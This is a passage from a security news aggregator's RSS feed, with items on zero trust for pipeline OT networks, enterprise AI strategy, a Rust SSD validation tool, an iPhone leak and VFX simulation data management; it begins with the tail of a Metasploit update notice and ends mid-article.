msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-06-22T13%3A23%3A28%2B01%3A00..2026-06-24T23%3A18%3A10Z%22">Pull Requests 6.4.140...6.4.141</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.140...6.4.141">Full diff 6.4.140...6.4.141</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Perplexity Launches Computer for Counsel: A Multi-Model Agentic Layer for Legal Workflows]]></title>
<description><![CDATA[Perplexity's Computer for Counsel extends Perplexity Computer to legal teams. It routes 20+ models across Midpage, MCP connectors, and Microsoft 365, with cited outputs lawyers can verify.
The post Perplexity Launches Computer for Counsel: A Multi-Model Agentic Layer for Legal Workflows appeared ...]]></description>
<link>https://tsecurity.de/de/3628465/ai-nachrichten/perplexity-launches-computer-for-counsel-a-multi-model-agentic-layer-for-legal-workflows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628465/ai-nachrichten/perplexity-launches-computer-for-counsel-a-multi-model-agentic-layer-for-legal-workflows/</guid>
<pubDate>Fri, 26 Jun 2026 21:48:46 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Perplexity's Computer for Counsel extends Perplexity Computer to legal teams. It routes 20+ models across Midpage, MCP connectors, and Microsoft 365, with cited outputs lawyers can verify.</p>
<p>The post <a href="https://www.marktechpost.com/2026/06/26/perplexity-launches-computer-for-counsel-a-multi-model-agentic-layer-for-legal-workflows/">Perplexity Launches Computer for Counsel: A Multi-Model Agentic Layer for Legal Workflows</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What CISOs need to tell the board about zero trust in OT: A 90-day communication and action plan]]></title>
<description><![CDATA[I work as a principal specialist at a pipeline operator where Operational Technology (OT) is the backbone of the business. I do not report to the board or act as a CISO, but the issues that get raised to those levels affect my job every single day.



Since the Colonial pipeline ransomware incide...]]></description>
<link>https://tsecurity.de/de/3626998/it-security-nachrichten/what-cisos-need-to-tell-the-board-about-zero-trust-in-ot-a-90-day-communication-and-action-plan/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626998/it-security-nachrichten/what-cisos-need-to-tell-the-board-about-zero-trust-in-ot-a-90-day-communication-and-action-plan/</guid>
<pubDate>Fri, 26 Jun 2026 12:09:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>I work as a principal specialist at a pipeline operator where Operational Technology (OT) is the backbone of the business. I do not report to the board or act as a CISO, but the issues that get raised to those levels affect my job every single day.</p>



<p>Since the <a href="https://www.energy.gov/ceser/colonial-pipeline-cyber-incident">Colonial pipeline ransomware incident in 2021</a>, it has become apparent that our industry has started posing different tones of “Are we zero trust yet?” I frequently witness its intense significance through auditing requests, TSA security directives and conversations around some control project’s goals.</p>



<p>One experience the zero trust role has changed is that it often feels misaligned with OT heavy environments. The NIST’s <a href="https://tsapps.nist.gov/publication/get_pdf.cfm?pub_id=930420">Zero Trust Architecture (SP 800‑207) model</a> works for all, but is originally written as though for an IT network, not terminals, compressor stations and control rooms where equipment must run 24/7, perhaps more aged than the technology present within the organization. CISA’s guidance on <a href="https://www.ic3.gov/CSA/2026/260429.pdf" target="_blank" rel="noreferrer noopener">adapting zero trust principles to operational technology</a> helps close that gap, but applying it means satisfying the OT teams and company leadership at the same time.</p>



<h2 class="wp-block-heading">The zero trust question I hear behind the scenes</h2>



<p>I am pretty sure we all know it comes as a jolt of reality after something really major has happened, rather than a bullet point on a slide deck. You have pipeline. The whole distribution stops for six days. In Washington, DC, US congressional hearings are underway, and legislation is coming. <a href="https://www.tsa.gov/sites/default/files/tsa_sd_pipeline-2021-02-july-21_2022.pdf">TSA Directive 2021-02C</a> requires pipeline operators to attest to several things, like network segmentation and zero-trust architectures.</p>



<p><a href="https://www.nerc.com/globalassets/standards/reliability-standards/cip/cip-013-2.pdf">NERC CIP-013</a> exists on a similar tack, more around supply chain security. In our case, the decision on how to select and manage a vendor partner and control their remote access is driven by regulatory compliance and governance frameworks. So, you have all those things that happen externally and force change. They say, “Are you zero trust? Yes or no?” We always get “yes.” They know it is not “yes, ” and the vendors know it is not “yes,” and nothing gets done about it until something happens.</p>



<h2 class="wp-block-heading">How I reframe zero trust for OT in my work</h2>



<p>My influence comes from how I frame problems and options in the conversations I am invited into. Zero trust is a good example.</p>



<p>NIST’s SP 800‑207 describes zero trust as a model where access decisions are to be based on strong identity, policy and context rather than network. CISA’s OT guidance narrows it, advising operators on the appearance of devices, identity management and what overlaps with IT instead of the overall replacement. <a href="https://www.csoonline.com/article/4143100/why-zero-trust-breaks-down-in-iot-and-ot-environments.html" target="_blank">Why zero trust breaks down in IoT and OT environments</a>” highlights that when facing the complications of IoT and OT environments, one needs to be proactive.</p>



<p>During these conversations, I try to focus on three major points when talking about IoT.</p>



<ol class="wp-block-list">
<li>Refer to zero trust as its functioning principle. In my experience, teams respond better when I say “Every user and system has to prove who they are and why they need access” than when I talk about abstract architectures. That language matches what NIST and CISA emphasize without overwhelming people with jargon.</li>



<li>Focus on where IT and OT converge, like jump hosts, historian connections, remote access paths and shared identity stores that span both worlds. Those are the choke points where zero trust style controls like stronger authentication, least privilege and detailed logging can give us quick wins without disrupting operations that depend on predictable behavior.</li>



<li>Tie everything that we need to do to the existing requirements. The conversation moves from “why are we changing this?” to “how do we do this well?” which aligns with TSA Security Directive Pipeline‑2021‑02C, a CISA alert or a NERC CIP‑013 requirement.</li>
</ol>



<h2 class="wp-block-heading">A 90-day plan OT leaders can execute</h2>



<p>While someone operates a gas pipeline, they cannot play around with zero trust. Questions such as: “What can we accomplish before the TSA checks up next quarter?” Or “How can we show the internal audit team we are making progress this month?” comes often. We have established a list of actions we take over in a ninety-day plan, because we find it aligns more with our industrial settings while also being transferable to other OT settings.</p>



<h3 class="wp-block-heading">Days 1–30: Map assets and identities at the IT/OT boundary</h3>



<p>The first 30 days are for increased visibility. I focus on a relatively simple question: “Who and what can currently reach OT, intentionally or accidentally?”</p>



<p>CISA’s guidance on zero trust for OT, alongside other warnings, advocates for identifying and managing assets and communications where IT and OT interfaces exist, in addition to informal remote access routes. Also, TSA requires pipeline operators to regularly update and manage plans detailing which networks, systems and access points they will assess as per their established requirements across both IT and OT.</p>



<p>In my position, it comes down to three actions. First, I work with OT engineers, network staff and asset inventory systems to determine which OT assets threaten operations, safety or compliance if compromised, rather than inventorying every device. Second, I map the users and links that reach into OT, such as internal staff granted advanced privileges, remote vendor support, VPNs and cloud platforms that interact with production data. Third, I categorize these identities and connections based on risk, impact and exposure, not by their roles.</p>



<p>By the close of the first 30 days, the intention is to present leadership with an easily comprehensible overview: outlining the critical OT assets, delineating the entry points from both internal IT systems and external sources and identifying the associated identities. Having established this common understanding makes subsequent zero trust discussions less vague.</p>



<h3 class="wp-block-heading">Days 31–60: Contain vendor remote access and create early wins</h3>



<p>Look for quick wins in the next month, in a high-impact but non-disruptive area. Vendor or third-party remote access often fulfills it, and CISA has warned about it and continues to do so.</p>



<p>Their guidance emphasizes best practices, including using MFA, segmented user privileges and monitoring third-party activity independently. The NERC CIP-013 requires utilities to consider cybersecurity threats and risk management that protect their supply chains and suppliers that connect to critical systems. The TSA’s pipeline directives expect close monitoring and controls of remote access. In my case, early wins look like telling a vendor: OK, instead of an unsecured, remote access method, use an audited brokered remote access solution. MFA for any and all remote OT sessions. Close old vendor RDP connections that are not in service. You are simply saying that times change and since these methods were put in place a few years back, they have evolved; it is reasonable for you to evolve.</p>



<h3 class="wp-block-heading">Days 61–90: Build a simple maturity scorecard and narrative</h3>



<p>The third month is about visibility and repeatable progress. We now will have more clarity on assets and identities traversing the IT/OT boundary and have choked down the most dangerous of remote access paths. Now we will take time to track where we have been over time.</p>



<p>I will consult with leaders within security and OT teams to identify the right-sized set of metrics relevant to the specific context of the organization. While the specific terminology may vary, many will align with common language found in TSA, NERC, CISA and other industry documents. Consider the broad themes of “govern, protect and detect &amp; respond”.</p>



<p>We can then identify solid “now” and “better next quarter” capabilities within each of these themes. “Govern” could incorporate specific OT policies on identity and access management that pull in zero trust directives alongside existing authoritative frameworks. “Protect” might track what fraction of your high-impact OT assets have been put behind better segmentation practices, coupled with the percent of your remote access pathways to OT identified as high-risk that have both MFA and a brokered connection. “Detect &amp; respond” could see tested playbooks in place assuming a remote connection compromise that directly injects malware into an OT system, which aligns with how recent incidents have unfolded throughout North American utilities.</p>



<p>The output is not a scorecard to pass around but will be a meaningful, honest conversation for our leaders. You will know how to accurately frame how your organization applies zero trust in the OT world today, show what you achieved over the past three months and honestly describe where there is more work ahead.</p>



<p>I am not the only one trying to make zero trust ideas actually fit OT, and I pay attention to the CISOs who voice the same frustrations with IoT and OT environments. We are solving the same problem from different seats. What I have found is that a workable 90-day plan, updated monthly, beats any pledge to “Let us achieve zero trust together”</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.csoonline.com/expert-contributor-network/">Want to join?</a></strong></p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Shaping a lasting AI strategy in a fast-changing world]]></title>
<description><![CDATA[AI is entering a phase of sustained enterprise adoption. As the technology rapidly advances, organizations are moving beyond isolated use cases and short-term efficiency gains and rethinking how they use AI to create value, meet changing customer expectations and evolve their operating models ove...]]></description>
<link>https://tsecurity.de/de/3626996/it-security-nachrichten/shaping-a-lasting-ai-strategy-in-a-fast-changing-world/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626996/it-security-nachrichten/shaping-a-lasting-ai-strategy-in-a-fast-changing-world/</guid>
<pubDate>Fri, 26 Jun 2026 12:09:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>AI is entering a phase of sustained enterprise adoption. As the technology rapidly advances, organizations are moving beyond isolated use cases and short-term efficiency gains and rethinking how they use AI to create value, meet changing customer expectations and evolve their operating models over the next several years.</p>



<p>That requires a clear end goal, an honest assessment of current capabilities and a practical roadmap for moving from today’s reality to that end goal.</p>



<p>Today, we are seeing five accelerating trends shaping how that transition is unfolding.</p>



<h2 class="wp-block-heading">LLMs are evolving into AgenticOS platforms</h2>



<p>Horizontal LLM providers like Anthropic and vertical AI companies like Harvey are moving beyond standalone AI models and building broader enterprise platforms. These platforms combine AI models with workflows, playbooks, integrations and governance tools inside a single environment, which are beginning to be described as an “AgenticOS.” As a result, the market is beginning to consolidate around a smaller number of platform providers that can simplify procurement, integration, spend management and data privacy compliance.</p>



<h2 class="wp-block-heading">Context windows have expanded by orders of magnitude</h2>



<p>Leading AI models can now process dramatically more information at once than they could just a few years ago, with the amount of information they can analyze in a single interaction expanding roughly 125× since 2023. That shift is making more complex, enterprise-scale work, like large-scale contract review, codebase-wide analysis and multi-document research synthesis, possible. Such capabilities, which once felt cutting-edge, are becoming standard expectations.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/flagship-llm-context-window-evolution.png" alt="Figure 1: Flagship LLM context window evolution, OpenAI and Anthropic, March 2023 – May 2026." class="wp-image-4189596" width="986" height="654" sizes="auto, (max-width: 986px) 100vw, 986px"><figcaption class="wp-element-caption"><em>Figure 1: Flagship LLM context window evolution, OpenAI and Anthropic, March 2023 – May 2026.</em></figcaption></figure><p class="imageCredit">John Wei</p></div>



<h2 class="wp-block-heading">Token pricing has stabilized at the production tier</h2>



<p>After dropping rapidly between 2023 and 2025, the cost of using mainstream AI models has started to stabilize. Today, many enterprise-grade models fall within a <a href="https://intuitionlabs.ai/articles/llm-api-pricing-comparison-2025" rel="nofollow">relatively predictable range</a> of roughly $2–$3 per million input tokens and about $15 per million output tokens, making costs easier to anticipate and manage.</p>



<p>At the same time, cost-saving features like prompt caching (which can reduce costs by up to 90%) and batch APIs (which can cut costs by roughly 50%) are making AI significantly cheaper to operate at scale. Together, those shifts are making AI spending easier for enterprises to budget, forecast and manage like other core technology investments.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/flagship-llm-token-cost-evolution.png?w=1024" alt="Figure 2: Flagship LLM token cost evolution, OpenAI and Anthropic, March 2023 – May 2026." class="wp-image-4189595" width="1024" height="650" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><em>Figure 2: Flagship LLM token cost evolution, OpenAI and Anthropic, March 2023 – May 2026.</em></figcaption></figure><p class="imageCredit">John Wei</p></div>



<h2 class="wp-block-heading">AI is functioning as a productivity assistant, not a human replacement.</h2>



<p>I had the chance to speak with senior leaders at this year’s WSJ Future of Everything conference, and one theme consistently emerged: despite the hype around AI agents, many companies are still using AI to support human decision-making rather than replace it.</p>



<p>Data shared by the senior leadership team of a prominent AI company at the WSJ conference shows that AI agents consume less than 5% of tokens today, and 84% of enterprise use cases are growth-focused rather than productivity-focused. That is largely because AI workflows still depend heavily on the quality and consistency of inputs. In complex enterprise environments with variable scenarios and edge cases, human judgment, prompt refinement and iterative review remain essential.</p>



<p>As a result, workflows can rarely be fully automated, and many automation gains translate into incremental productivity improvements rather than meaningful headcount reduction without broader operating model changes.</p>



<p>Instead, many organizations are using AI to drive growth, support new business models and enable new ways of operating.</p>



<h2 class="wp-block-heading">Software development is the leading edge of human-AI collaboration.</h2>



<p>In our experience at Integreon, vibe coding has produced a few notable success stories. At enterprise scale, though, it can introduce architectural limitations and sometimes even hardcoding or semi-hardcoded shortcuts that undermine the long-term sustainability of the code. As a result, we primarily use AI coding tools as developer assistants for targeted tasks rather than end-to-end software development. That approach reflects a broader industry trend: <a href="https://www.techtimes.com/articles/315282/20260321/tech-layoffs-surge-while-ai-jobs-soar-key-trends-shaping-2026-tech-industry.htm" rel="nofollow">despite high-profile tech layoffs, overall demand for developers has remained steady, and demand for developers with AI skills is rising.</a></p>



<p>Across all five trends, the focus has shifted from automating legacy workflows to assisting human workflows. This is a fundamental change in how work will be organized across the enterprise.</p>



<p>As AI technologies mature and become widely accessible across industries, competitive advantage will increasingly come from strategy rather than the technology itself. Many businesses will have access to the same AI platforms, models and tools. What will differentiate organizations is how they apply those technologies to shape customer experience, operating models and market positioning.</p>



<p>The airline industry offers a useful parallel. Most airlines operate similar aircraft under the same regulatory and labor constraints, yet they differ dramatically in market positioning, customer experience and operational performance. What separates airlines is not the plane itself, but how the business is built around it.</p>



<p>For CIOs and CTOs, choosing an AI platform is no longer the main challenge. The more important conversations now center on where the business is headed and how AI supports that strategy. Leaders must ask themselves questions like:</p>



<ul class="wp-block-list">
<li><strong>Who do we want to become?</strong> Most enterprises have mission statements, but far fewer know exactly where they want the business to go over the next three to five years as AI reshapes customer expectations, competition and economics. That answer needs to be concrete enough to guide real decisions.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Wh</strong><strong>at are we choosing not to do</strong><strong>?</strong> Strategic restraint matters just as much as strategic ambition. AI lowers many costs, making it tempting for organizations to spread themselves across too many initiatives. But without clear boundaries, organizations risk stretching resources too thin.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Where </strong><strong>are we</strong><strong> today?</strong> That means taking a real look at which parts of the business AI may shrink or disrupt over the next three to five years. Many companies struggle to assess this honestly because those areas still generate revenue today. Sometimes it takes an outside perspective to spot risks internal teams are too close to see.</li>
</ul>



<ul class="wp-block-list">
<li><strong>What capabilities do we need to succeed three to five years from now</strong><strong>?</strong> Companies often plan by projecting today’s business forward instead of starting with where they want to end up. Usually, the answer comes down to a few key differentiators, like proprietary data, customer trust or distribution, along with a broader set of capabilities that simply need to be strong and reliable.</li>
</ul>



<ul class="wp-block-list">
<li><strong>How will we organize</strong><strong> work</strong><strong>? </strong>Enterprises must rethink how work gets done. Most operating models today were built around human labor. Going forward, many workflows will likely be shared between AI systems and human oversight.</li>
</ul>



<ul class="wp-block-list">
<li><strong>What kind of talent do we need?</strong> This can be especially difficult for companies with long histories and established teams. Employees who drove success in the past may not align perfectly with where the business is headed next. Companies will need to think carefully about how experienced employees can help build and support future capabilities.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Where can we </strong><strong>simplify</strong><strong> workflows?</strong> In many cases, workflows can be reduced to three core steps. First is building context, including defining the goals, data, constraints and decision-making framework. Then comes AI execution, where AI is applied to workflows and tasks. Finally, humans review outputs and make judgment calls.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Which AI platforms do we actually need?</strong> Most enterprises do not have the capacity to effectively manage dozens of AI vendors and tools at once. Every additional platform adds more integration work, governance, vendor oversight and security review requirements. In most cases, organizations are better off making a small number of focused platform bets than constantly chasing the latest AI tool.</li>
</ul>



<h2 class="wp-block-heading">Finally, a few thoughts on what to avoid</h2>



<p>The best mentors I’ve had taught me to think in three-to-five-year terms. A good strategy should remain relatively stable over that period. Without that consistency, organizations end up resetting direction too often and losing credibility in the process.</p>



<p>Today, I see two common mistakes. The first is staying too anchored to the past, defaulting to reasons something cannot happen because of security, compliance or organizational resistance. The second is the opposite: chasing every new technology simply because it is new. Most enterprises will need to find a middle ground over the next several years.</p>



<p>AI is the aircraft. Strategy is the route.</p>



<p>The companies that pull ahead will not necessarily be the ones spending the most on AI or launching the most pilots. They will be the ones whose leaders answered the hard questions, stayed committed to a direction and learned from mistakes along the way.</p>



<p>Technology will continue to change. Strategy is what will determine who uses it well.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The fastest storage validator for Linux (Open-Source)]]></title>
<description><![CDATA[Hey everyone,  I recently bought a barely used 4TB M.2 SSD at a steep discount. Of course, the first thing you want to do with a cheap, used drive is verify that it actually has the stated capacity so you don't get burned by fake firmware.  When looking for validation tools on Linux, the typical ...]]></description>
<link>https://tsecurity.de/de/3626184/linux-tipps/the-fastest-storage-validator-for-linux-open-source/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626184/linux-tipps/the-fastest-storage-validator-for-linux-open-source/</guid>
<pubDate>Fri, 26 Jun 2026 04:26:33 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hey everyone, </p> <p>I recently bought a barely used 4TB M.2 SSD at a steep discount. Of course, the first thing you want to do with a cheap, used drive is verify that it actually has the stated capacity so you don't get burned by fake firmware. </p> <p>When looking for validation tools on Linux, the typical options are running fio scripts, badblocks, or piping dd streams. But these present a few problems. badblocks is ancient and severely bottlenecks modern PCIe 4.0/5.0 NVMe drives, fio is unintuitive and primarily a benchmarking tool. You can configure it to do almost the same as EVFY (fio uses a PRNG, not CSPRNG) but this results in a CPU bottleneck since fio's PRNG engine is too slow. </p> <p>I decided to create a modern, open-source replacement in Rust called Entropy Verify (EVFY). I gave my best to put together all the technical pieces that would make for a great storage validation software.<br> EVFY features: </p> <p><strong>Direct I/O:</strong> Bypasses OS RAM caching to force raw reads and writes. </p> <p><strong>Multi-threaded Worker Architecture:</strong> Pins worker threads to CPU cores and pipelines async I/O to max out NVMe speeds. </p> <p><strong>Cryptographic Checks:</strong> Generates uncompressible data via AES-NI streams and verifies integrity using the BLAKE3 hashing engine. </p> <p><strong>TUI Interface:</strong> Displays real-time thread workloads, throughput, and block metrics using the Ratatui crate. Pressing [Tab] switches between decimal and binary units. </p> <p><strong>Safety Guardrails:</strong> Hardcoded blocks to stop you from accidentally executing a test on operating system root partitions (C:\ or /). Cross-Platform compatibility: Supports Windows and Linux (utilizing io_uring on modern kernels, fallback for older kernels is included and works out of the box). </p> <p><strong>Verification Reports:</strong> Generates a markdown report on the target volume with performance metrics and block corruption logs. </p> <p>The code is open-source, uses the AGPL-3.0 license and is ready for auditing/contributions. If you have a sketchy or new high-capacity drive you need to stress test or validate at maximum transfer speeds feel free to take a look at the project. </p> <p>GitHub: <a href="https://github.com/blamie/EntropyVerify">https://github.com/blamie/EntropyVerify</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Glum-Office279"> /u/Glum-Office279 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1uffw26/the_fastest_storage_validator_for_linux_opensource/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uffw26/the_fastest_storage_validator_for_linux_opensource/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Leak claims iPhone Ultra 2 is already greenlit, but maybe not iPhone Air 3]]></title>
<description><![CDATA[Months ahead of the iPhone Ultra's expected fall release, a new leak claims Apple has already greenlit its replacement while keeping its powder dry on a potential iPhone Air 3.The iPhone Ultra is just the beginning.Apple's first foldable iPhone now looks increasingly likely to be called iPhone Ul...]]></description>
<link>https://tsecurity.de/de/3624327/ios-mac-os/leak-claims-iphone-ultra-2-is-already-greenlit-but-maybe-not-iphone-air-3/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624327/ios-mac-os/leak-claims-iphone-ultra-2-is-already-greenlit-but-maybe-not-iphone-air-3/</guid>
<pubDate>Thu, 25 Jun 2026 13:39:14 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Months ahead of the iPhone Ultra's expected fall release, a new leak claims Apple has already greenlit its replacement while keeping its powder dry on a potential <a href="https://appleinsider.com/inside/iphone-air" title="iPhone Air" data-kpt="1">iPhone Air 3</a>.<br><br><div><img src="https://photos5.appleinsider.com/gallery/68045-143446-67320-141847-iphonefoldrenderapril20262-xl-xl.jpg" alt="Foldable smartphone standing in a V shape displaying a colorful mountain landscape, beside a small succulent plant and a glowing cat-shaped night light on a tidy desk" height="738"><br><span>The iPhone Ultra is just the beginning.</span></div><br>Apple's first foldable <a href="https://appleinsider.com/inside/iphone" title="iPhone" data-kpt="1">iPhone</a> now looks increasingly likely to be called iPhone Ultra. But in a post to Weibo, leaker Digital Chat Station <a href="https://weibo.com/6048569942/R5KM596W5">says</a> Apple has already confirmed development of the second-gen model.<br><br>However, with Apple thought to be working on an iPhone Air 2, the likelihood of a third iteration is unclear. The leaker believes Apple will wait and see how well the second-gen version fares before committing to a third.<br><br><br> <strong>Rumor Score:</strong> 🤔 Possible <br><br><br> <a href="https://appleinsider.com/articles/26/06/25/leak-claims-iphone-ultra-2-is-already-greenlit-but-maybe-not-iphone-air-3?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244771?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Taming complexity in simulation-driven VFX movies]]></title>
<description><![CDATA[I still remember the first time we tried to simulate a large-scale water sequence nearly two decades ago. It was a simple brief — “make it look real.” What followed was anything but simple. Machines struggled, artists waited and we often had to compromise between realism and deadlines. Back then,...]]></description>
<link>https://tsecurity.de/de/3624053/it-security-nachrichten/taming-complexity-in-simulation-driven-vfx-movies/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624053/it-security-nachrichten/taming-complexity-in-simulation-driven-vfx-movies/</guid>
<pubDate>Thu, 25 Jun 2026 12:09:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>I still remember the first time we tried to simulate a large-scale water sequence nearly two decades ago. It was a simple brief — “make it look real.” What followed was anything but simple. Machines struggled, artists waited and we often had to compromise between realism and deadlines. Back then, simulation in VFX felt like a powerful but unpredictable beast — something you respected, but never fully controlled.</p>



<p>Fast forward to today, and that beast has grown bigger, faster and far more demanding. As someone who has spent over 25 years in animation and VFX technology, I’ve seen simulation evolve from a niche capability into the backbone of modern visual effects. Whether it’s oceans, explosions, cloth, smoke, or destruction — simulation now defines realism. But with that realism comes a level of complexity that is reshaping how studios think, build and operate their pipelines.</p>



<p>This is <a href="https://semiengineering.com/the-era-of-fluid-simulations-in-hollywood/" rel="nofollow">the story of that shift</a> — and how we’re learning to tame it.</p>



<h2 class="wp-block-heading">When realism became data</h2>



<p>In the early days, simulations were relatively lightweight. A smoke sim might take hours, maybe a day. Today, a high-resolution fluid simulation can generate terabytes of data for a single sequence.</p>



<p>That’s the first big change: <strong>Simulation is no longer just computation — it’s data generation at scale</strong>.</p>



<p>Every frame we simulate produces layers of information — velocity fields, density grids, particle caches, mesh outputs. Multiply that across hundreds of shots, and suddenly your pipeline isn’t just about rendering images — it’s about managing massive datasets.</p>



<p>I’ve seen studios hit a point where storage, not compute, became the bottleneck. Artists weren’t waiting for simulations to finish — they were waiting for data to move.</p>



<p>This shift forces a fundamental rethink:<br>We are no longer just running simulations. We are managing simulation ecosystems.</p>



<h2 class="wp-block-heading">Lessons from other worlds</h2>



<p>What’s interesting is — VFX is not alone in this journey. Other industries faced similar challenges earlier, and there’s a lot we can quietly borrow from them.</p>



<p>In <strong>weather forecasting</strong>, global climate models run on massive HPC systems, producing petabytes of data daily. But meteorologists don’t store everything forever. They <a href="https://ieeexplore.ieee.org/document/10774970" rel="nofollow">prioritize <em>derived insights</em> over raw data</a> — keeping summaries, patterns and key states instead of full datasets.</p>



<p>In <strong>genomics</strong>, sequencing a single human genome produces hundreds of gigabytes of raw data. Labs long ago realized that recomputing certain stages is cheaper than storing everything indefinitely. So they intentionally discard intermediate data — but keep the pipeline reproducible.</p>



<p>In <strong>autonomous driving</strong>, simulation environments generate enormous synthetic datasets. Companies don’t just store scenarios — they index them semantically: “Pedestrian crossing at night in rain,” for example. That makes retrieval intelligent, not just archival.</p>



<p>The pattern across all these domains is clear: <strong>They don’t fight data growth — they design around it.</strong></p>



<h2 class="wp-block-heading">The rise of HPC in VFX</h2>



<p>To handle this scale, High Performance Computing (HPC) has become essential.</p>



<p>Years ago, a render farm was enough. Today, simulations demand tightly coupled compute — clusters with high-speed interconnects, parallel file systems and optimized schedulers. In many ways, VFX studios now resemble scientific research labs.</p>



<p>But here’s the catch:<br>More compute doesn’t automatically mean better outcomes.</p>



<p>Throwing thousands of cores at a problem can speed things up, but it also increases <a href="https://www.atlantis-press.com/journals/jrnal/125917284/view" rel="nofollow">cost, complexity and coordination challenges</a>.</p>



<p>Here’s a practice I’ve seen work well, but is rarely talked about:<br>treat compute like a budget, not a resource pool.</p>



<p>Instead of unlimited access, assign “compute envelopes” per sequence or department. This forces smarter iteration — teams think before re-running simulations blindly.</p>



<p>Another overlooked idea: <strong>Simulate at multiple fidelities intentionally, not progressively.</strong></p>



<p>Most pipelines go low → mid → high resolution. But some studios now run <em>parallel exploratory sims</em> at different fidelities and let ML or heuristics decide which path to invest in further. It reduces dead-end iterations dramatically.</p>



<h2 class="wp-block-heading">Complexity is no longer in the solver</h2>



<p>Traditionally, we focused on improving solvers. Today, the hardest problems are about context — understanding what was done, why it worked and whether it can be reproduced.</p>



<p>Questions like which version was used, what parameters changed, or how upstream assets influenced the result are now central to the pipeline.</p>



<p>A practical way to address this is to treat each simulation as a uniquely identifiable event. By capturing not just inputs but also solver versions, environments and dependencies, teams can create what I often call a “simulation fingerprint.” If anything changes, the fingerprint changes — making reproducibility far more reliable.</p>



<h2 class="wp-block-heading">The power of structured data</h2>



<p>Metadata is no longer optional — it’s foundational.</p>



<p>However, the real value lies not in storing metadata, but in using it actively. When structured correctly, metadata can guide decisions — helping systems route jobs, anticipate failures and recommend better configurations.</p>



<p>At that point, the pipeline begins to evolve from a passive system into something more adaptive — one that <a href="https://tridiagonalsoftware.com/resources/the-power-of-simulations-how-to-harness-data-for-informed-decision-making" rel="nofollow">supports teams rather than slowing them down</a>.</p>



<h2 class="wp-block-heading">Learning from the past: Machine learning as a guide</h2>



<p>Machine learning in VFX is often misunderstood as a replacement for physics. In reality, its strength lies in learning from experience.</p>



<p>Every simulation leaves behind valuable data. When used correctly, this data can help teams avoid repeating work. For example, before launching a new simulation, systems can check whether something similar has already been done and suggest reuse or adaptation. Similarly, early signals in a simulation can indicate whether it is likely to fail, allowing teams to stop it before wasting hours of compute.</p>



<p>In this sense, machine learning becomes an intelligence layer — quietly <a href="https://www.awn.com/news/new-white-paper-dives-deep-nvidia-omniverse-enterprise-animation-and-vfx" rel="nofollow">improving efficiency without replacing the underlying physics</a>.</p>



<h2 class="wp-block-heading">Rethinking storage: Not everything needs to live forever</h2>



<p>One of the hardest mindset shifts is accepting that not all data needs to be preserved.</p>



